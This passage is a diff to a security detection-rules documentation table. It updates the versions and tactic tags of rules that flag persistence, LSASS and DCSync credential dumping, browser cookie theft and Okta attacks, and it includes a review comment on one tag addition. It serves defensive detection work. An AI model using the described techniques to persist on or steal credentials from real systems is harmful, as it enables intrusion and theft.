execute on Windows systems protected by digital signature validation. Adversaries may use these binaries to 'live off the land' and execute malicious files that could bypass application allowlists and signature validation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 |<<network-logon-provider-registry-modification, Network Logon Provider Registry Modification>> |Identifies the modification of the network logon provider registry. 
Adversaries may register a rogue network logon provider module for persistence and/or credential access via intercepting the authentication credentials in clear text during user logon. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<network-traffic-to-rare-destination-country, Network Traffic to Rare Destination Country>> |A machine learning job detected a rare destination country name in the network logs. This can be due to initial access, persistence, command-and-control, or exfiltration activity. For example, when a user clicks on a link in a phishing email or opens a malicious document, a request may be sent to download and run a payload from a server in a country which does not normally appear in network traffic or business work-flows. Malware instances and persistence mechanisms may communicate with command-and-control (C2) infrastructure in their country of origin, which may be an unusual destination country for the source network. |[Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning] |8.3.0 |103 -|<<network-level-authentication-nla-disabled, Network-Level Authentication (NLA) Disabled>> |Identifies the attempt to disable Network-Level Authentication (NLA) via registry modification. Network Level Authentication (NLA) is a feature on Windows that provides an extra layer of security for Remote Desktop (RDP) connections, as it requires users to authenticate before allowing a full RDP session. Attackers can disable NLA to enable persistence methods that require access to the Windows sign-in screen without authenticating, such as Accessibility Features persistence methods, like Sticky Keys. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Rule Type: BBR] |8.3.0 |1 +|<<network-level-authentication-nla-disabled, Network-Level Authentication (NLA) Disabled>> |Identifies the attempt to disable Network-Level Authentication (NLA) via registry modification. Network Level Authentication (NLA) is a feature on Windows that provides an extra layer of security for Remote Desktop (RDP) connections, as it requires users to authenticate before allowing a full RDP session. Attackers can disable NLA to enable persistence methods that require access to the Windows sign-in screen without authenticating, such as Accessibility Features persistence methods, like Sticky Keys. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Rule Type: BBR] |8.3.0 |2 -|<<new-activesyncalloweddeviceid-added-via-powershell, New ActiveSyncAllowedDeviceID Added via PowerShell>> |Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a new ActiveSync allowed device. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<new-activesyncalloweddeviceid-added-via-powershell, New ActiveSyncAllowedDeviceID Added via PowerShell>> |Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a new ActiveSync allowed device. Adversaries may target user email to collect sensitive information. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<new-github-app-installed, New GitHub App Installed>> |This rule detects when a new GitHub App has been installed in your organization account. GitHub Apps extend GitHub's functionality both within and outside of GitHub. When an app is installed it is granted permissions to read or modify your repository and organization data. Only trusted apps should be installed and any newly installed apps should be investigated to verify their legitimacy. Unauthorized app installation could lower your organization's security posture and leave you exposed for future attacks. |[Domain: Cloud], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Github] |8.3.0 |1 |<<new-github-owner-added, New GitHub Owner Added>> |Detects when a new member is added to a GitHub organization as an owner. This role provides admin level privileges. Any new owner roles should be investigated to determine it's validity. Unauthorized owner roles could indicate compromise within your organization and provide unlimited access to data and settings. |[Domain: Cloud], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Github] |8.3.0 |1 -|<<new-systemd-service-created-by-previously-unknown-process, New Systemd Service Created by Previously Unknown Process>> |Systemd service files are configuration files in Linux systems used to define and manage system services. Malicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |4 +|<<new-systemd-service-created-by-previously-unknown-process, New Systemd Service Created by Previously Unknown Process>> |Systemd service files are configuration files in Linux systems used to define and manage system services. Malicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |5 -|<<new-systemd-timer-created, New Systemd Timer Created>> |Detects the creation of a systemd timer within any of the default systemd timer directories. Systemd timers can be used by an attacker to gain persistence, by scheduling the execution of a command or script. Similarly to cron/at, systemd timers can be set up to execute on boot time, or on a specific point in time, which allows attackers to regain access in case the connection to the infected asset was lost. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |5 +|<<new-systemd-timer-created, New Systemd Timer Created>> |Detects the creation of a systemd timer within any of the default systemd timer directories. Systemd timers can be used by an attacker to gain persistence, by scheduling the execution of a command or script. 
Similarly to cron/at, systemd timers can be set up to execute on boot time, or on a specific point in time, which allows attackers to regain access in case the connection to the infected asset was lost. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |6 |<<new-or-modified-federation-domain, New or Modified Federation Domain>> |Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation] |8.3.0 |102 -|<<nping-process-activity, Nping Process Activity>> |Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the ability to construct raw packets for a wide variety of security testing applications, including denial of service testing. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<nping-process-activity, Nping Process Activity>> |Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the ability to construct raw packets for a wide variety of security testing applications, including denial of service testing. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<nullsessionpipe-registry-modification, NullSessionPipe Registry Modification>> |Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<nullsessionpipe-registry-modification, NullSessionPipe Registry Modification>> |Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<o365-email-reported-by-user-as-malware-or-phish, O365 Email Reported by User as Malware or Phish>> |Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access] |8.3.0 |102 
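Review bot: The added [Tactic: Defense Evasion] on "NullSessionPipe Registry Modification" (105 -> 106) is not supported by that row's description, which only speaks of "adversary lateral movement preparation by making the added pipe available to everyone"; either extend the description to say what is being evaded or drop the tag, so the table and the rule metadata agree. The other tag additions in this hunk are consistent with their text: [Tactic: Defense Evasion] on "Network Connection via Registration Utility" matches "bypassing allowlists", and [Tactic: Execution] on "New ActiveSyncAllowedDeviceID Added via PowerShell" matches the cmdlet-based description. Unrelated to this change but visible in context, the "Network Traffic to Rare Destination Country" row lists both [Rule Type: ML] and [Rule Type: Machine Learning]; one of the two is redundant and could be removed in a follow-up.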
@@ -968,19 +994,19 @@ and their rule type is `machine_learning`. |<<o365-mailbox-audit-logging-bypass, O365 Mailbox Audit Logging Bypass>> |Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Initial Access], [Tactic: Defense Evasion] |8.3.0 |102 -|<<office-test-registry-persistence, Office Test Registry Persistence>> |Identifies the modification of the Microsoft Office "Office Test" Registry key, a registry location that can be used to specify a DLL which will be executed every time an MS Office application is started. Attackers can abuse this to gain persistence on a compromised host. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<office-test-registry-persistence, Office Test Registry Persistence>> |Identifies the modification of the Microsoft Office "Office Test" Registry key, a registry location that can be used to specify a DLL which will be executed every time an MS Office application is started. Attackers can abuse this to gain persistence on a compromised host. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 -|<<okta-brute-force-or-password-spraying-attack, Okta Brute Force or Password Spraying Attack>> |Identifies a high number of failed Okta user authentication attempts from a single IP address, which could be indicative of a brute force or password spraying attack. An adversary may attempt a brute force or password spraying attack to obtain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.3.0 |106 +|<<okta-brute-force-or-password-spraying-attack, Okta Brute Force or Password Spraying Attack>> |Identifies a high number of failed Okta user authentication attempts from a single IP address, which could be indicative of a brute force or password spraying attack. An adversary may attempt a brute force or password spraying attack to obtain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.10.0 |207 -|<<okta-threatinsight-threat-suspected-promotion, Okta ThreatInsight Threat Suspected Promotion>> |Okta ThreatInsight is a feature that provides valuable debug data regarding authentication and authorization processes, which is logged in the system. Within this data, there is a specific field called threat_suspected, which represents Okta's internal evaluation of the authentication or authorization workflow. When this field is set to True, it suggests the presence of potential credential access techniques, such as password-spraying, brute-forcing, replay attacks, and other similar threats. 
|[Use Case: Identity and Access Audit], [Data Source: Okta] |8.3.0 |104 +|<<okta-threatinsight-threat-suspected-promotion, Okta ThreatInsight Threat Suspected Promotion>> |Okta ThreatInsight is a feature that provides valuable debug data regarding authentication and authorization processes, which is logged in the system. Within this data, there is a specific field called threat_suspected, which represents Okta's internal evaluation of the authentication or authorization workflow. When this field is set to True, it suggests the presence of potential credential access techniques, such as password-spraying, brute-forcing, replay attacks, and other similar threats. |[Use Case: Identity and Access Audit], [Data Source: Okta] |8.10.0 |205 -|<<okta-user-session-impersonation, Okta User Session Impersonation>> |A user has initiated a session impersonation granting them access to the environment with the permissions of the user they are impersonating. This would likely indicate Okta administrative access and should only ever occur if requested and expected. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.3.0 |106 +|<<okta-user-session-impersonation, Okta User Session Impersonation>> |A user has initiated a session impersonation granting them access to the environment with the permissions of the user they are impersonating. This would likely indicate Okta administrative access and should only ever occur if requested and expected. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.10.0 |207 |<<onedrive-malware-file-upload, OneDrive Malware File Upload>> |Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. 
Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment. |[Domain: Cloud], [Data Source: Microsoft 365], [Tactic: Lateral Movement] |8.3.0 |102 -|<<outbound-scheduled-task-activity-via-powershell, Outbound Scheduled Task Activity via PowerShell>> |Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |104 +|<<outbound-scheduled-task-activity-via-powershell, Outbound Scheduled Task Activity via PowerShell>> |Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |105 -|<<parent-process-pid-spoofing, Parent Process PID Spoofing>> |Identifies parent process spoofing used to thwart detection. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 +|<<parent-process-pid-spoofing, Parent Process PID Spoofing>> |Identifies parent process spoofing used to thwart detection. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |105 |<<peripheral-device-discovery, Peripheral Device Discovery>> |Identifies use of the Windows file system utility (fsutil.exe) to gather information about attached peripheral devices and components connected to a computer system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 
@@ -996,39 +1022,39 @@ and their rule type is `machine_learning`. |<<persistence-via-folder-action-script, Persistence via Folder Action Script>> |Detects modification of a Folder Action script. A Folder Action script is executed when the folder to which it is attached has items added or removed, or when its window is opened, closed, moved, or resized. Adversaries may abuse this feature to establish persistence by utilizing a malicious script. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<persistence-via-hidden-run-key-detected, Persistence via Hidden Run Key Detected>> |Identifies a persistence mechanism that utilizes the NtSetValueKey native API to create a hidden (null terminated) registry key. An adversary may use this method to hide from system utilities such as the Registry Editor (regedit). |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<persistence-via-hidden-run-key-detected, Persistence via Hidden Run Key Detected>> |Identifies a persistence mechanism that utilizes the NtSetValueKey native API to create a hidden (null terminated) registry key. An adversary may use this method to hide from system utilities such as the Registry Editor (regedit). |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<persistence-via-kde-autostart-script-or-desktop-file-modification, Persistence via KDE AutoStart Script or Desktop File Modification>> |Identifies the creation or modification of a K Desktop Environment (KDE) AutoStart script or desktop file that will execute upon each user logon. Adversaries may abuse this method for persistence. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<persistence-via-kde-autostart-script-or-desktop-file-modification, Persistence via KDE AutoStart Script or Desktop File Modification>> |Identifies the creation or modification of a K Desktop Environment (KDE) AutoStart script or desktop file that will execute upon each user logon. Adversaries may abuse this method for persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<persistence-via-login-or-logout-hook, Persistence via Login or Logout Hook>> |Identifies use of the Defaults command to install a login or logoff hook in MacOS. An adversary may abuse this capability to establish persistence in an environment by inserting code to be executed at login or logout. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<persistence-via-microsoft-office-addins, Persistence via Microsoft Office AddIns>> |Detects attempts to establish persistence on an endpoint by abusing Microsoft Office add-ins. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<persistence-via-microsoft-office-addins, Persistence via Microsoft Office AddIns>> |Detects attempts to establish persistence on an endpoint by abusing Microsoft Office add-ins. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<persistence-via-microsoft-outlook-vba, Persistence via Microsoft Outlook VBA>> |Detects attempts to establish persistence on an endpoint by installing a rogue Microsoft Outlook VBA Template. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 -|<<persistence-via-powershell-profile, Persistence via PowerShell profile>> |Identifies the creation or modification of a PowerShell profile. PowerShell profile is a script that is executed when PowerShell starts to customize the user environment, which can be abused by attackers to persist in a environment where PowerShell is common. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |5 +|<<persistence-via-powershell-profile, Persistence via PowerShell profile>> |Identifies the creation or modification of a PowerShell profile. PowerShell profile is a script that is executed when PowerShell starts to customize the user environment, which can be abused by attackers to persist in a environment where PowerShell is common. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |6 |<<persistence-via-scheduled-job-creation, Persistence via Scheduled Job Creation>> |A job can be used to schedule programs or scripts to be executed at a specified date and time. Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 -|<<persistence-via-telemetrycontroller-scheduled-task-hijack, Persistence via TelemetryController Scheduled Task Hijack>> |Detects the successful hijack of Microsoft Compatibility Appraiser scheduled task to establish persistence with an integrity level of system. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<persistence-via-telemetrycontroller-scheduled-task-hijack, Persistence via TelemetryController Scheduled Task Hijack>> |Detects the successful hijack of Microsoft Compatibility Appraiser scheduled task to establish persistence with an integrity level of system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<persistence-via-update-orchestrator-service-hijack, Persistence via Update Orchestrator Service Hijack>> |Identifies potential hijacking of the Microsoft Update Orchestrator Service to establish persistence with an integrity level of SYSTEM. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Use Case: Vulnerability], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<persistence-via-update-orchestrator-service-hijack, Persistence via Update Orchestrator Service Hijack>> |Identifies potential hijacking of the Microsoft Update Orchestrator Service to establish persistence with an integrity level of SYSTEM. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Use Case: Vulnerability], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<persistence-via-wmi-event-subscription, Persistence via WMI Event Subscription>> |An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. 
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<persistence-via-wmi-event-subscription, Persistence via WMI Event Subscription>> |An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<persistence-via-wmi-standard-registry-provider, Persistence via WMI Standard Registry Provider>> |Identifies use of the Windows Management Instrumentation StdRegProv (registry provider) to modify commonly abused registry locations for persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<persistent-scripts-in-the-startup-directory, Persistent Scripts in the Startup Directory>> |Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<port-forwarding-rule-addition, Port Forwarding Rule Addition>> |Identifies the creation of a new port forwarding rule. 
An adversary may abuse this technique to bypass network segmentation restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<port-forwarding-rule-addition, Port Forwarding Rule Addition>> |Identifies the creation of a new port forwarding rule. An adversary may abuse this technique to bypass network segmentation restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<possible-consent-grant-attack-via-azure-registered-application, Possible Consent Grant Attack via Azure-Registered Application>> |Detects when a user grants permissions to an Azure-registered application or when an administrator grants tenant-wide permissions to an application. An adversary may create an Azure-registered application that requests access to data such as contact information, email, or documents. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |8.3.0 |106 -|<<possible-fin7-dga-command-and-control-behavior, Possible FIN7 DGA Command and Control Behavior>> |This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint] |8.3.0 |103 +|<<possible-fin7-dga-command-and-control-behavior, Possible FIN7 DGA Command and Control Behavior>> |This rule detects a known command and control pattern in network events. 
The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network. |[Use Case: Threat Detection], [Tactic: Command and Control], [Domain: Endpoint] |8.3.0 |104 -|<<possible-okta-dos-attack, Possible Okta DoS Attack>> |Detects possible Denial of Service (DoS) attacks against an Okta organization. An adversary may attempt to disrupt an organization's business operations by performing a DoS attack against its Okta service. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.3.0 |104 +|<<possible-okta-dos-attack, Possible Okta DoS Attack>> |Detects possible Denial of Service (DoS) attacks against an Okta organization. An adversary may attempt to disrupt an organization's business operations by performing a DoS attack against its Okta service. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.10.0 |205 -|<<potential-abuse-of-repeated-mfa-push-notifications, Potential Abuse of Repeated MFA Push Notifications>> |Detects when an attacker abuses the Multi-Factor authentication mechanism by repeatedly issuing login requests until the user eventually accepts the Okta push notification. An adversary may attempt to bypass the Okta MFA policies configured for an organization to obtain unauthorized access. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.3.0 |106 +|<<potential-abuse-of-repeated-mfa-push-notifications, Potential Abuse of Repeated MFA Push Notifications>> |Detects when an attacker abuses the Multi-Factor authentication mechanism by repeatedly issuing login requests until the user eventually accepts the Okta push notification. An adversary may attempt to bypass the Okta MFA policies configured for an organization to obtain unauthorized access. 
|[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.10.0 |207 |<<potential-admin-group-account-addition, Potential Admin Group Account Addition>> |Identifies attempts to add an account to the admin group via the command line. This could be an indication of privilege escalation activity. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |104 
@@ -1036,53 +1062,65 @@ and their rule type is `machine_learning`. |<<potential-application-shimming-via-sdbinst, Potential Application Shimming via Sdbinst>> |The Application Shim was created to allow for backward compatibility of software as the operating system codebase changes over time. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<potential-code-execution-via-postgresql, Potential Code Execution via Postgresql>> |This rule monitors for suspicious activities that may indicate an attacker attempting to execute arbitrary code within a PostgreSQL environment. Attackers can execute code via PostgreSQL as a result of gaining unauthorized access to a public facing PostgreSQL database or exploiting vulnerabilities, such as remote command execution and SQL injection attacks, which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-code-execution-via-postgresql, Potential Code Execution via Postgresql>> |This rule monitors for suspicious activities that may indicate an attacker attempting to execute arbitrary code within a PostgreSQL environment. Attackers can execute code via PostgreSQL as a result of gaining unauthorized access to a public facing PostgreSQL database or exploiting vulnerabilities, such as remote command execution and SQL injection attacks, which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 |<<potential-command-and-control-via-internet-explorer, Potential Command and Control via Internet Explorer>> |Identifies instances of Internet Explorer (iexplore.exe) being started via the Component Object Model (COM) making unusual network connections. Adversaries could abuse Internet Explorer via COM to avoid suspicious processes making network connections and bypass host-based firewall restrictions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |104 |<<potential-cookies-theft-via-browser-debugging, Potential Cookies Theft via Browser Debugging>> |Identifies the execution of a Chromium based browser with the debugging process argument, which may indicate an attempt to steal authentication cookies. An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials. |[Domain: Endpoint], [OS: Linux], [OS: Windows], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |103 -|<<potential-credential-access-via-dcsync, Potential Credential Access via DCSync>> |This rule identifies when a User Account starts the Active Directory Replication Process. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |109 +|<<potential-credential-access-via-dcsync, Potential Credential Access via DCSync>> |This rule identifies when a User Account starts the Active Directory Replication Process. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Privilege Escalation], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |110 |<<potential-credential-access-via-duplicatehandle-in-lsass, Potential Credential Access via DuplicateHandle in LSASS>> |Identifies suspicious access to an LSASS handle via DuplicateHandle from an unknown call trace module. This may indicate an attempt to bypass the NtOpenProcess API to evade detection and dump LSASS memory for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon Only] |8.8.0 |206 -|<<potential-credential-access-via-lsass-memory-dump, Potential Credential Access via LSASS Memory Dump>> |Identifies suspicious access to LSASS handle from a call trace pointing to DBGHelp.dll or DBGCore.dll, which both export the MiniDumpWriteDump method that can be used to dump LSASS memory content in preparation for credential access. 
